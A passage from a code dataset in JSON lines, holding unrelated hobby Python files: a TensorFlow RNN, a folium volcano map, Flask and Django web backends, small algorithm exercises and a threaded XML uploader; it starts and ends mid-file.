self.is_training:\n cells = [tf.nn.rnn_cell.DropoutWrapper(cell_, output_keep_prob = self.output_keep_prob)\n for cell_ in cells]\n\n \n # These layers are combined into a conventient MultiRNNCell object\n multi_cell = tf.nn.rnn_cell.MultiRNNCell(cells)\n\n # Read input data \n self.train_data = list()\n for _ in range(self.num_unrollings):\n self.train_data.append(\n tf.placeholder(tf.float32, shape=[None, self.input_shape]))\n\n self.train_labels = list()\n for _ in range(self.num_unrollings):\n self.train_labels.append(\n tf.placeholder(tf.float32, [None, 1]))\n \n \n # Feed the data to the RNN model\n outputs = tf.Variable(np.zeros([self.num_unrollings, self.batch_size, 1]))\n outputs, self.state = tf.nn.static_rnn(multi_cell, self.train_data, dtype=tf.float32)\n \n # Classifier. For training, we remove the last output, as it has no label.\n # The last output is only used for prediction purposes during sampling.\n self.w = tf.Variable(tf.truncated_normal([self.num_nodes, 1], -0.1, 0.1), name='output_w')\n self.b = tf.Variable(tf.zeros([1]), name='output_b')\n \n logits = tf.matmul(tf.concat(axis=0,values=outputs), self.w) + self.b \n \n logits = tf.reshape(logits, [self.num_unrollings, -1, 1])\n #self.train_labels = tf.concat(axis=0,values=self.train_labels)\n #self.train_labels = tf.reshape(self.train_labels, [self.batch_size, 1, self.num_unrollings])\n\n self.sample_prediction = logits \n\n \n self.loss = tf.losses.mean_squared_error(self.train_labels, logits)\n #self.loss = self.loss = tf.reduce_mean(\n # tf.nn.softmax_cross_entropy_with_logits(\n # logits=logits, labels=self.train_labels))\n \n # Optimizer.\n if self.only_retrain_output:\n self.optimizer = tf.train.AdamOptimizer().minimize(loss=self.loss, var_list=[self.w, self.b])\n else: \n self.optimizer = tf.train.AdamOptimizer().minimize(self.loss)\n\n\n # Train prediction. We keep this to keep track of the model's progress.\n self.train_prediction = logits\n self.session=tf.Session()\n with self.session.as_default():\n init_op = tf.global_variables_initializer()\n self.session.run(init_op)\n \n\n\n def train(self, num_steps):\n \n self.is_training = True\n\n with self.session.as_default():\n\n mean_loss=0\n\n for step in range(num_steps):\n\n feed_dict = dict()\n \n x_batch, y_batch = self.batch_generator.next_batch('train')\n #y_batch = y_batch.reshape([self.batch_generator.batch_size, self.num_unrollings, 1])\n for i in range(self.num_unrollings): \n \n feed_dict[self.train_data[i]] = x_batch[:,:,i] \n feed_dict[self.train_labels[i]] = y_batch[:,:,i]\n \n \n _, l, predictions, = self.session.run(\n [self.optimizer, self.loss, self.train_prediction], feed_dict=feed_dict)\n\n mean_loss += l\n\n if step % self.summary_frequency == 0:\n\n if step > 0:\n mean_loss = mean_loss / self.summary_frequency\n self.loss_list.append(mean_loss)\n val_loss = self.get_val_loss()\n self.val_loss_list.append(val_loss)\n\n # The mean loss is an estimate of the loss over the last few batches.\n print(' Average train loss at step %d: %f ' % (step, mean_loss))\n print('Average val loss at step %d: %f ' % (step, val_loss))\n\n mean_loss=0\n\n\n def return_output_weights(self):\n\n feed_dict=dict()\n x_batch, y_batch = self.batch_generator._next()\n for i in range(self.num_unrollings + 1):\n feed_dict[self.train_data[i]] = x_batch[i]\n\n return self.session.run([self.w], feed_dict=feed_dict)[-1]\n\n\n def create_restore_dict(self):\n\n variable_names = [v for v in tf.trainable_variables()]\n variable_handles = [v.name for v in variable_names]\n restore_dict = dict(zip(variable_handles, variable_names))\n restore_dict.pop('Variable:0')\n restore_dict.pop('output_w:0')\n restore_dict.pop('output_b:0')\n\n return restore_dict\n\n\n def save(self, checkpointname, full_model=True):\n\n self.saver = tf.train.Saver()\n if full_model == False:\n restore_dict = self.create_restore_dict()\n with self.session.as_default():\n self.saver = tf.train.Saver(restore_dict)\n\n self.saver.save(self.session, checkpointname)\n print('Model saved')\n\n\n def load(self, checkpointname, full_model=True):\n\n self.saver = tf.train.Saver()\n if full_model == False:\n restore_dict = self.create_restore_dict()\n with self.session.as_default():\n self.saver = tf.train.Saver(restore_dict)\n\n self.saver.restore(self.session, checkpointname)\n print('Model restored')\n\n\n def predict(self, inputs):\n\n self.is_training = False\n \n feed_dict = dict()\n for i in range(self.num_unrollings):\n feed_dict[self.train_data[i]] = inputs[:,:,i] \n predictions, = self.session.run(\n [self.sample_prediction], feed_dict=feed_dict)\n \n return predictions\n\n\n def get_val_loss(self):\n \n x_val, y_val = self.batch_generator.next_batch('test')\n \n feed_dict = dict()\n labels = list()\n \n for i in range(self.num_unrollings):\n feed_dict[self.train_data[i]] = x_val[:,:,i] \n labels.append(y_val[:,:,i])\n \n pred, = self.session.run(\n [self.sample_prediction], feed_dict=feed_dict)\n \n labels = np.array(labels)\n \n return np.mean(np.square(labels-pred))\n \n\n def plot_loss(self):\n\n x1=np.array(self.loss_list)\n x2=np.array(self.val_loss_list)\n plt.plot(x1,color='g',alpha=0.4, linewidth=5)\n plt.plot(x2,color='r',alpha=0.4, linewidth=5)\n plt.xlabel('Iterations')\n plt.legend(['train_loss', 'val_loss'])\n plt.show()\n\nif __name__ == '__main__':\n \n from batch_generator import BatchGenerator\n train_dir = '/media/sander/samsungssd/tradosaurus/train_data/'\n test_dir = '/media/sander/samsungssd/tradosaurus/test_data/'\n batch_size = 32\n n_future = 1\n generator = BatchGenerator(train_dir, test_dir, batch_size, n_future)\n\n \n summary_frequency=10\n num_nodes=16\n num_layers=3\n num_unrollings = 100-n_future\n batch_generator=generator \n input_shape = 3\n only_retrain_output=False\n output_keep_prob = 1\n cell=tf.nn.rnn_cell.LSTMCell\n \n nn = RNN(summary_frequency, num_nodes, num_layers, num_unrollings, n_future,\n batch_generator, input_shape, only_retrain_output, output_keep_prob,\n cell)\n nn.train(5000)\n nn.plot()\n \n x, y = generator.next_batch('train')\n x, y = x[0], y[0]\n y = y.reshape([100-n_future, 1])\n x = x.reshape([1, 3, 100-n_future])\n \n plt.plot(x[0,0,:])\n plt.plot(y)\n \n pred = nn.predict(x)\n \n #pred_plot = np.concatenate([np.zeros(n_future).reshape([n_future,1]), predictions])\n \n plt.scatter(pred, y)\n \n plt.plot(x[0,0,:], color='g', alpha=.4)\n plt.plot(y, color='r', alpha=.4)\n plt.plot(pred, color='b', alpha=.4)","sub_path":"rnn.py","file_name":"rnn.py","file_ext":"py","file_size_in_byte":9108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"574475412","text":"import folium\r\nimport pandas as pd\r\n\r\ndf1 = pd.read_csv(\"Volcanoes_USA.txt\")\r\n#from geopy.geocoders import Nominatim\r\n#gv3 = Nominatim(user_agent=\"my-application\", scheme = \"https\")\r\n#df1['Coordinates'] = df1.Lat + df1.Lon\r\n#df['Pos'] = df1.Coordinates.apply(gv3.geocode)\r\n\r\nlat = list(df1.LAT)\r\nlon = list(df1.LON)\r\nelev = list(df1.ELEV)\r\nnme = list(df1.NAME)\r\n\r\ndef det_cr(elev):\r\n if elev in range(0,1000):\r\n return 'green'\r\n elif elev in range(1000,3000):\r\n return 'orange'\r\n else:\r\n return 'red'\r\n\r\nmap = folium.Map(location=[38.58, -90.09], tiles='Mapbox Bright', zoom_start=12)\r\nfg = folium.FeatureGroup(name=\"Volcanoes\")\r\n\r\nfor i,j,k,l in zip(lat,lon,nme,elev):\r\n fg.add_child(folium.CircleMarker(location=[i,j], radius=6, popup=folium.Popup(k, parse_html=True), \r\n fill_color=det_cr(l), color='grey', fill_opacity=0.7))\r\n# fg.add_child(folium.CircleMarker(location=[i,j], popup=folium.Popup(k, parse_html=True), tooltip=folium.Icon(color=det_cr(l))))\r\n\r\nfp = folium.FeatureGroup(name=\"Population\")\r\n \r\nfp.add_child(folium.GeoJson(data=open('world.json','r', encoding = 'utf-8-sig').read(),\r\nstyle_function=lambda x: {'fillColor':'green' if x['properties']['POP2005'] < 10000000 \r\nelse 'orange' if 10000000 <= x['properties']['POP2005'] < 20000000 else 'red'}))\r\n \r\nmap.add_child(fg)\r\nmap.add_child(fp)\r\nmap.add_child(folium.LayerControl())\r\nmap.save(\"webmap.html\")","sub_path":"Webmap.py","file_name":"Webmap.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"3112317","text":"from flask import Flask, make_response, request, render_template, send_file, abort, jsonify, send_from_directory\nfrom flask import Response\nimport io\nimport csv\nimport os\nfrom flask_cors import CORS, cross_origin\n\napp = Flask(__name__, static_url_path='')\nCORS(app, support_credentials=True)\n\n@app.route('//', methods=[\"GET\",\"POST\"])\n@cross_origin(supports_credentials=True)\ndef root(path, reqid):\n print('sending ' + path) \n return app.send_static_file(reqid + '/' + path)\n\n# # Let us see which works\n# @app.route('/results//')\n# #@app.route('/results//')\n# def send_js(path,reqid):\n# return send_from_directory('results/'+reqid, path)\n\n@app.route(\"/\")\ndef hello():\n return render_template(\"main_page.html\")\n\n# Dummy form to get information \n\n#@app.route('/transform', methods=[\"GET\",\"POST\"])\n# def transform_view():\n# #userid = request.form[\"userid\"]\n# userid = request.args.get('userid')\n# print(userid)\n# return userid\n\n# Getting a Post Request from the user to store queries in todo list\n@app.route('/add_request', methods=[\"GET\",\"POST\"]) #GET requests will be blocked\n@cross_origin(supports_credentials=True)\ndef read_request():\n req_data = request.get_json()\n user_id = str(req_data['user_id'])\n query = str(req_data['query'])\n \n with open('id_counter.csv', mode='r') as infile:\n # id_counter format - user_id : id_counter\n reader = csv.reader(infile) \n id_counter_dict = {rows[0]:rows[1] for rows in reader}\n print(id_counter_dict)\n if user_id in id_counter_dict:\n print('here')\n print( id_counter_dict[user_id] )\n id_counter_dict[user_id] = str(int(id_counter_dict[user_id]) + 1)\n id_counter = int(id_counter_dict[user_id])\n else:\n print('here2')\n #print( id_counter_dict[user_id] )\n id_counter_dict[user_id] = 0\n id_counter = 0\n with open('id_counter.csv', 'w') as fw:\n for key in id_counter_dict.keys():\n fw.write(\"%s,%s\\n\"%(key,id_counter_dict[key]))\n\n\n #req_id = user_id + '_' + str(req_data['req_id']) \n req_id = user_id + '_' + str(id_counter)\n source = str(req_data['type'])\n mode = str(req_data['mode'])\n\n \n\n ######## Youtube translation to backend format\n if source == 'Youtube':\n if mode == 'audio':\n source_mode = source + '_0'\n else:\n source_mode = source + '_1'\n \n ######## Wikitravel translatio to backend format\n if source == 'Wikitravel':\n source_mode = source + '_' + mode\n \n \n line = [user_id, req_id, source_mode, query]\n print('Writing this to todo.csv')\n print(line) \n with open('todo.csv', 'a', newline='') as fw:\n writer = csv.writer(fw, delimiter=',')\n writer.writerow(line)\n print(\"Stored in todo\")\n req_data['server_request_id'] = req_id\n print(type(req_data))\n return jsonify(req_data)\n\n\n\n@app.route('/send_results', methods=[\"GET\",\"POST\"])\n@cross_origin(supports_credentials=True)\ndef transform_view():\n req_data=request.get_json()\n user_id = str(req_data['user_id'])\n\n \n req_id= str(req_data['server_request_id'])\n req_id_original = str(req_data['server_request_id'])\n #req_id = user_id + '_' + str(req_data['req_id'])\n if req_data['query'] == 'Valparaiso':\n req_id = 'w_0' \n if req_data['query'] == 'Hyderabad':\n req_id = 'w_1'\n if req_data['query'] == 'Gaand':\n req_id = 'yt_1'\n UPLOAD_DIRECTORY = 'static/'+req_id\n print('looking for your request in the following directory')\n print(UPLOAD_DIRECTORY)\n if not os.path.exists(UPLOAD_DIRECTORY):\n # Create response\n message = {\"server_request_id\":req_id_original,\"status\":\"Downloading\"}\n #return Response(jsonify(message), status=200, mimetype='application/json')\n return jsonify(message), 200\n #return \"Wait till you get it!\"\n else: \n files = []\n path = 'static/' + str(req_id) + '/'\n print(path)\n #ip_address = '192.168.43.31' \n import socket \n hostname = socket.gethostname() \n IPAddr = socket.gethostbyname(hostname)\n print('IP Address :')\n print(IPAddr) \n for i in os.listdir(path):\n files.append(i) \n\n # Weirdly the following line is giving 127.0.0.1 as ip address for alfredo \n #full_path_array = ['http://' + IPAddr + ':5000/' + str(req_id) + '/' + s for s in files]\n full_path_array = [str(req_id) + '/' + s for s in files]\n response_frontend = {}\n response_frontend['status'] = \"OK\"\n response_frontend['links'] = full_path_array\n response_frontend['server_request_id'] = req_id_original\n \n # Add the server address (MAKE IT AGNOSTIC OF IP ADDRESS)\n return jsonify(response_frontend)\n\n@app.route('/backup/', methods=[\"GET\",\"POST\"])\n@cross_origin(supports_credentials=True)\ndef give_backup(userid):\n req_data=request.get_json()\n directory_to_look = 'static/backup/' + userid + '.json'\n import json\n if request.method == 'GET':\n with open(directory_to_look, 'r', encoding='utf-8') as f:\n json_data = json.load(f)\n return (jsonify(json_data))\n if request.method == 'POST':\n print()\n with open(directory_to_look, 'w+', encoding='utf-8') as f:\n json.dump(req_data, f)\n message = {\"status\":\"OK\"}\n return jsonify(message), 200\n \n \n\n\n\n\nif __name__ == \"__main__\":\n app.run(host= '0.0.0.0', ssl_context='adhoc')","sub_path":"server_final.py","file_name":"server_final.py","file_ext":"py","file_size_in_byte":5608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"621621184","text":"# Autor: Bruno Omar Jiménez Mancilla A01748931\n# Descripcion: Un programa que calcule IVA, propina y el total de una comida\n\n# Escribe tu programa después de esta línea.\nc=float(input(\"Ingresa el total de tu comida: \"))\np=c*.13\ni=c*.16\nt=c+p+i\nstr(print(\"Costo de su comida: $\",round(c,2),\n \"Propina: $\",round(p,2),\n \"IVA: $\",round(i,2),\n \"Total a pagar: $\",round(t,2),))\n","sub_path":"cuenta.py","file_name":"cuenta.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"216621644","text":"from flask import *\nfrom scrapper import Scrapper\n\napp = Flask(__name__)\n\n@app.route('/aule', methods=['GET'])\ndef aule():\n aula = request.args.get('aula')\n settimanaDopo = request.args.get('settimanaDopo')\n\n # Conversione da string a boolean\n if settimanaDopo == 'True':\n settimanaDopo = True\n else:\n settimanaDopo = False\n scrapper = Scrapper()\n dati = scrapper.cerca_orario_aule(aula, settimanaDopo)\n if dati is None:\n return \"SETTIMANA DI VACANZA\"\n ris = \"Aula \" + aula + \"
\"\n for giorni in dati:\n for giorno in giorni.values():\n if isinstance(giorno, str):\n ris += giorno + \" \"\n else:\n for materie in giorno:\n for materia in materie.values():\n if isinstance(materia, str):\n ris += materia + \" \"\n else:\n for classe in materia:\n ris += classe + \" \"\n ris += \"
\"\n ris += \"
\"\n return ris\n\n","sub_path":"Selenium/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"644712157","text":"\n# title\n# find all unique quadruplets\n\nnums = [int(x) for x in input().split()]\ntarget = input()\n\n# \"1 0 -1 0 -2 2\"\n# 0\n\n# -2 -1 0 0 1 2 \ndef solve(nums, target):\n res = set()\n hmap = {}\n for i in range(len(nums)):\n for j in range(i+1, len(nums)):\n _sum = nums[i] + nums[j]\n if _sum in hmap:\n for pair in hmap[_sum]:\n if i not in pair and j not in pair:\n res.add(tuple(sorted([nums[i], nums[j], nums[pair[0]], nums[pair[1]]])))\n if target - _sum not in hmap:\n hmap[target - _sum] = set()\n hmap[target - _sum].add((i, j))\n \n return map(list, res)\n \n \nprint(solve(nums, target))","sub_path":"leetcode/4sum.py","file_name":"4sum.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"328200753","text":"import copy\n\ndef compute_shipment(shipment, warehouses):\n min_list = warehouses + warehouses\n for i in range(0, len(warehouses)):\n ship_copy = copy.deepcopy(shipment)\n list = []\n res = recursive_helper(ship_copy, i, list, warehouses)\n if len(res) < len(min_list):\n min_list = res\n if len(min_list) > len(warehouses):\n return []\n return min_list\n\n\n\"\"\" this function recursively backtracks through all combinations of warehouses starting from a given index\"\"\"\ndef recursive_helper(shipment, idx, list, warehouses):\n #if you have reached the end of the list of warehouses and not fulfilled order, break recursion with a list that is impossible to reach\n if idx == len(warehouses) and len(shipment) > 0:\n return warehouses + warehouses #not possible to reach this answer, the correct answer is guaranteed to be shorter\n #if you have fulfilled the shipment, then return the list of warehouses\n elif len(shipment) == 0:\n return list\n #else subtract the inventory of the warehouse at current index, add that warehouse to list, and recursively repeat from idx+1 to len(warehouses)\n else:\n #subtract inventory of current warehouse from the shipment\n warehouse = warehouses[idx]\n dict = {} #key: item, val: amount taken from warehouse\n rmv_key_list = [] # list of keys to remove form shipment\n for itm in shipment.keys():\n amount = get_warehouse_amt(warehouse, itm)\n if amount >= shipment[itm]:\n dict[itm] = shipment[itm]\n rmv_key_list.append(itm)\n else:\n dict[itm] = amount\n old = shipment[itm]\n shipment[itm] = old - amount\n #remove any items from shipment that are totally fulfilled\n for k in rmv_key_list:\n del shipment[k]\n #add the current warehouse to list\n list_dict = {}\n list_dict[warehouse['name']] = dict\n list.append(list_dict)\n #now recursively get shortest list\n min_list = warehouses + warehouses\n for i in range(idx+1, len(warehouses)+1):\n shipment_copy = copy.deepcopy(shipment)\n list_copy = copy.deepcopy(list)\n res = recursive_helper(shipment_copy, i, list_copy, warehouses)\n if len(res) < len(min_list):\n min_list = res\n\n return min_list\n\n\n#small helper function for indexing nested dicts\ndef get_warehouse_amt(warehouse, item):\n itm_dict = warehouse['inventory']\n if item in itm_dict.keys():\n return itm_dict[item]\n else:\n return 0\n","sub_path":"src/submission.py","file_name":"submission.py","file_ext":"py","file_size_in_byte":2639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"30759980","text":"'''A module to run unit tests.'''\n\nimport unittest\n\ndef _run_tests():\n test_suite = unittest.TestLoader().discover(\n start_dir='.', pattern='*_test.py', top_level_dir='.')\n\n unittest.TextTestRunner(verbosity=2).run(test_suite)\n\nif __name__ == \"__main__\":\n _run_tests()\n","sub_path":"run_unit_tests.py","file_name":"run_unit_tests.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"610449910","text":"import os\nimport time\nimport asyncio\nimport websockets\nfrom queue import Queue\nfrom django.utils import timezone\nfrom django.core.management.base import BaseCommand\nfrom html_parser.websocket import check_updates\nfrom html_parser.worker import Worker\nfrom html_parser.models import UserTask\nfrom threading import Thread\n\n\ndef web(port):\n # worst method ever\n os.system('python manage.py runserver 0.0.0.0:{} --insecure'.format(port))\n\n\nclass Command(BaseCommand):\n help = 'Запустить парсер отдельной командой'\n\n def add_arguments(self, parser):\n # Positional arguments\n parser.add_argument('port', nargs='+', type=int)\n\n # Named (optional) arguments\n parser.add_argument(\n '--port',\n action='store_true',\n dest='delete',\n help='Add port to run django app',\n )\n\n def handle(self, *args, **options):\n\n port = options['port'][0]\n\n parser_thread = Thread(target=web, args=(port,))\n\n # run websocket in second thread; able to set port via params\n start_server = websockets.serve(check_updates, \"localhost\", 9999)\n global_timeout = 2\n asyncio.get_event_loop().run_until_complete(start_server)\n Thread(target=asyncio.get_event_loop().run_forever).start()\n\n try:\n parser_thread.start()\n work_queue = Queue()\n html_parser = Worker(work_queue, global_timeout)\n html_parser.start()\n\n # Другим потоком накидываю задания в очередь\n while True:\n\n now = timezone.now()\n for task in UserTask.objects.filter(status='0', date__lte=now):\n work_queue.put(task)\n\n time.sleep(global_timeout * 3)\n\n except KeyboardInterrupt:\n # hard close application\n os._exit(0)\n","sub_path":"html_parser/management/commands/run_parser.py","file_name":"run_parser.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"537170431","text":"# -*- coding: utf-8 -*\nimport os\nimport requests\nfrom lxml import etree\nfrom threading import Thread\nfrom Queue import Queue\n\npath = '/opt/data'\nurl = 'https://swfdev.com/'\nfiles = [os.path.join(path, f) for f in os.listdir(path) if f.endswith('.xml')]\n\n\nclass TThread(Thread):\n def __init__(self, queue, file):\n self.queue = queue\n self.file = file\n Thread.__init__(self)\n\n def run(self):\n self.send_pos()\n\n self.queue.task_done()\n\n def parsing(self, file):\n d, l = {}, []\n context = etree.iterparse(file, tag='node')\n for action, elem in context:\n values = elem.xpath('value[@genre=\"user\"]')\n e = {v.get('label'): v.text for v in values}\n e['node_id'] = elem.get('id')\n l.append(e)\n d['node'] = l\n d['gateway_id'] = context.root.get('gateway_id')\n return d\n\n def send_pos(self):\n values = {'data': self.parsing(self.file)}\n requests.post(url, data=values)\n\nqueue = Queue()\n\nfor f in files:\n t = TThread(queue, f)\n queue.put(t)\n t.start()\n\nqueue.join()\n","sub_path":"main/threading/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"449754909","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom models import XPlayer, Mute, FriendsList, Feedback, CloudPlayerIds, Version, XLog\nimport json\n# Create your views here.\n\n\n\ndef index(request):\n return HttpResponse(\"1\")\n\ndef example2(request):\n return HttpResponse(\"2\")\n\ndef snia(request):\n userId = request.GET.get(\"userId\", \"definetelysomethingthatdoesntexist\")\n newEmail = request.GET.get(\"newEmail\", \"\")\n dddUser = XPlayer.objects.filter(objectId = userId)\n\n if len(dddUser) == 0:\n return HttpResponse(\"-1\")\n else:\n dddUser[0].emailVerified = newEmail\n dddUser[0].save()\n return HttpResponse(\"snia: \" + dddUser[0].emailVerified)\n\n#http://127.0.0.1:8000/x/createUser/?username=dimitris&facebookId=23423423423124123&isMale=1\ndef createUser(request):\n username = request.GET.get(\"username\", \"\")\n facebokId = request.GET.get(\"facebookId\", \"\")\n isMale = request.GET.get(\"isMale\", \"1\")\n if (isMale == \"1\"):\n isMale = True\n else:\n isMale = False\n users = XPlayer.objects.filter(fbId = facebokId)\n newLog = XLog(userId=facebokId, action=1)\n newLog.save()\n if len(users) == 0:\n newUser = XPlayer(fbId = facebokId, pUsername = username, isMale=isMale)\n newUser.save()\n newLog = XLog(userId = facebokId, action = 2)\n newLog.save()\n return HttpResponse(convertToJson(newUser), content_type='application/json')\n else:\n return HttpResponse(convertToJson(users[0]), content_type='application/json')\n\n\ndef createCloudId(request):\n cloudId = request.GET.get(\"cloudId\", \"\")\n facebookId = request.GET.get(\"facebookId\", \"\")\n users = CloudPlayerIds.objects.filter(cloudId =cloudId, facebookId = facebookId)\n newLog = XLog(userId=facebookId, action=3)\n newLog.save()\n if len(users) == 0:\n newUser = CloudPlayerIds(facebookId = facebookId, cloudId = cloudId)\n newUser.save()\n return HttpResponse(\"1\")\n else:\n return HttpResponse(\"1\")\n\ndef addversion(request):\n version = request.GET.get(\"version\", \"\")\n newVersion = Version(version = version)\n newVersion.save()\n return HttpResponse()\n\ndef version(request):\n # obj = Version.objects.all()\n # version = obj[len(obj) - 1].version\n version = Version.objects.all().order_by(\"-createdAt\")[0].version\n return HttpResponse(version)\n\ndef feedback(request):\n facebookId_ = request.GET.get(\"fbId\", \"\")\n text_ = request.GET.get(\"text\", \"\")\n users = Feedback(facebookId = facebookId_)\n users.text = text_\n users.save()\n newLog = XLog(userId=facebookId_, action=4)\n newLog.save()\n return HttpResponse(\"1\")\n\ndef addFriend(request):\n user = request.GET.get(\"user\", \"\")\n friend = request.GET.get(\"friend\", \"\")\n users = FriendsList.objects.filter(fbId = user, friend = friend)\n newLog = XLog(userId = user, action=5)\n newLog.save()\n if len(users) == 0:\n newFriend = FriendsList(fbId=user, friend=friend)\n newFriend.save()\n return HttpResponse(\"1\")\n else:\n return HttpResponse(\"1\")\n\ndef addMute(request):\n reporter = request.GET.get(\"reporter\",\"\")\n user = request.GET.get(\"user\", \"\")\n users = Mute.objects.filter(reporter = reporter, user = user)\n newLog = XLog(userId = reporter, action=6)\n newLog.save()\n if len(users) == 0:\n newReport = Mute(reporter = reporter, user = user)\n newReport.save()\n return HttpResponse(\"1\")\n else:\n return HttpResponse(\"1\")\n\n\ndef userId(request):\n userId = request.GET.get(\"userId\", \"\")\n user = XPlayer.objects.filter(fbId = userId)\n newLog = XLog(userId=userId, action=7)\n newLog.save()\n if len(user) == 0:\n return HttpResponse(-1)\n else:\n return HttpResponse(convertToJson(user[0]), content_type='application/json')\n\ndef convertToJson(user):\n return json.dumps({\n \"pUsername\": user.pUsername,\n \"isMale\": user.isMale,\n \"facebookId\": user.fbId,\n \"objectId\": user.objectId,\n \"totalGamesXeri\": user.totalGamesXeri,\n \"xeri\": user.xeri,\n \"plakoto\": user.plakoto,\n \"emailVerified\": user.emailVerified,\n \"totalGamesPlakoto\": user.totalGamesPlakoto,\n \"words\": user.words,\n \"totalGamesWords\": user.totalGamesWords,\n \"updatedAt\": str(user.updatedAt),\n \"authData\": user.authData,\n \"scoreFour\": user.scoreFour,\n \"totalGamesScoreFour\": user.totalGamesScoreFour,\n \"totalGamesAgonia\": user.totalGamesAgonia,\n \"agonia\": user.agonia,\n \"griniaris\": user.griniaris,\n \"totalGamesGriniaris\": user.totalGamesGriniaris\n })\n\ndef friends(request):\n userId = request.GET.get(\"userId\", \"\")\n friends = FriendsList.objects.filter(fbId = userId).values_list('friend')\n newLog = XLog(userId = userId, action=8)\n newLog.save()\n if len(friends) == 0:\n return HttpResponse(\"[]\")\n\n else:\n friendStr = \"[\"\n for i in range(0,len(friends)):\n friendId = XPlayer.objects.filter(fbId = str(friends[i][0]))\n friendStr = friendStr + convertToJson(friendId[0]) + \",\"\n friendStr = friendStr[:-1] + \"]\"\n return HttpResponse(friendStr, content_type = 'application/json')\n\ndef friendMe(request):\n userId = request.GET.get(\"userId\", \"\")\n userFriends = FriendsList.objects.filter(friend = userId).values_list('fbId')\n newLog = XLog(userId = userId, action=9)\n newLog.save()\n if len(userFriends) == 0:\n return HttpResponse(\"[]\")\n else:\n friendStr = \"[\"\n for i in range(0,len(userFriends)):\n friendId = XPlayer.objects.filter(fbId = str(userFriends[i][0]))\n friendStr = friendStr + convertToJson(friendId[0]) + \",\"\n friendStr = friendStr[:-1] + \"]\"\n return HttpResponse(friendStr, content_type = 'application/json')\n\ndef mutes(request):\n userId = request.GET.get(\"userId\", \"\")\n muted = Mute.objects.filter(reporter = userId).values_list('user')\n newLog = XLog(userId=userId, action=10)\n newLog.save()\n if len(muted) == 0:\n return HttpResponse(\"[]\")\n else:\n MuteStr = \"[\"\n for i in range(0, len(muted)):\n mutedId = XPlayer.objects.filter(fbId = str(muted[i][0]))\n MuteStr = MuteStr + convertToJson(mutedId[0]) + \",\"\n\n MuteStr = MuteStr[:-1] + \"]\"\n return HttpResponse(MuteStr, content_type = 'application/json')\n\ndef mutedMe(request):\n userId = request.GET.get(\"userId\", \"\")\n reporters = Mute.objects.filter(user = userId).values_list('reporter')\n newLog = XLog(userId=userId, action=11)\n newLog.save()\n if len(reporters) == 0:\n return HttpResponse(\"[]\")\n else:\n reportersStr = \"[\"\n for i in range(0,len(reporters)):\n reporter = XPlayer.objects.filter(fbId = str(reporters[i][0]))\n reportersStr = reportersStr + convertToJson(reporter[0]) + \",\"\n reportersStr = reportersStr[:-1] + \"]\"\n return HttpResponse(reportersStr, content_type = 'application/json')\n\ndef unfriend(request):\n userId = request.GET.get(\"userId\",\"\")\n friendId = request.GET.get(\"friend\", \"\")\n friends = FriendsList.objects.filter(fbId = userId, friend = friendId)\n newLog = XLog(userId=userId, action=12)\n newLog.save()\n if len(friends) == 0:\n return HttpResponse(\"1\")\n else:\n friends.delete()\n return HttpResponse(\"1\")\n\ndef unmute(request):\n reporterId = request.GET.get(\"reporterId\", \"\")\n userId = request.GET.get(\"userId\",\"\")\n unMute = Mute.objects.filter(reporter = reporterId, user = userId)\n newLog = XLog(userId=reporterId, action=13)\n newLog.save()\n if len(unMute) == 0:\n return HttpResponse(\"1\")\n else:\n unMute.delete()\n return HttpResponse(\"1\")\n\ndef cloudId(request):\n userId = request.GET.get(\"userId\", \"\")\n cloudUser = CloudPlayerIds.objects.filter(facebookId = userId).values_list('cloudId')\n newLog = XLog(userId=userId, action=14)\n newLog.save()\n if len(cloudUser) == 0:\n return HttpResponse(\"[]\")\n else:\n cloudUserStr = \"[\"\n for i in range(0, len(cloudUser)):\n cloudUserStr = cloudUserStr + str(cloudUser[i][0]) + \",\"\n cloudUserStr = cloudUserStr[:-1]\n cloudUserStr = cloudUserStr + \"]\"\n return HttpResponse(cloudUserStr, content_type= 'csv/text')\n\ndef updateUser(request):\n userId = request.GET.get(\"userId\",\"\")\n totalGamesXeri = int(request.GET.get(\"totalGamesXeri\",\"0\"))\n xeri = int(request.GET.get(\"xeri\",\"0\"))\n plakoto = int(request.GET.get(\"plakoto\",\"0\"))\n emailVerified = request.GET.get(\"emailVerified\",\"\")\n pUsername = request.GET.get(\"pUsername\",\"\")\n totalGamesPlakoto = int(request.GET.get(\"totalGamesPlakoto\",\"0\"))\n words = int(request.GET.get(\"words\",\"0\"))\n totalGamesWords = int(request.GET.get(\"totalGamesWords\",\"0\"))\n authData = request.GET.get(\"authData\",\"\")\n username = request.GET.get(\"username\",\"\")\n isMale = request.GET.get(\"isMale\", \"1\")\n newLog = XLog(userId=userId, action=15)\n newLog.save()\n if (isMale == \"1\"):\n isMale = True\n else:\n isMale = False\n scoreFour = int(request.GET.get(\"scoreFour\",\"0\"))\n totalGamesAgonia = int(request.GET.get(\"totalGamesAgonia\",\"0\"))\n totalGamesScoreFour = int(request.GET.get(\"totalGamesScoreFour\",\"0\"))\n agonia = int(request.GET.get(\"agonia\",\"0\"))\n griniaris = int(request.GET.get(\"griniaris\", \"0\"))\n totalGamesGriniaris = int(request.GET.get(\"totalGamesGriniaris\", \"0\"))\n\n updateUser = XPlayer.objects.get(fbId = userId)\n if updateUser is None:\n return HttpResponse(\"-1\")\n else:\n 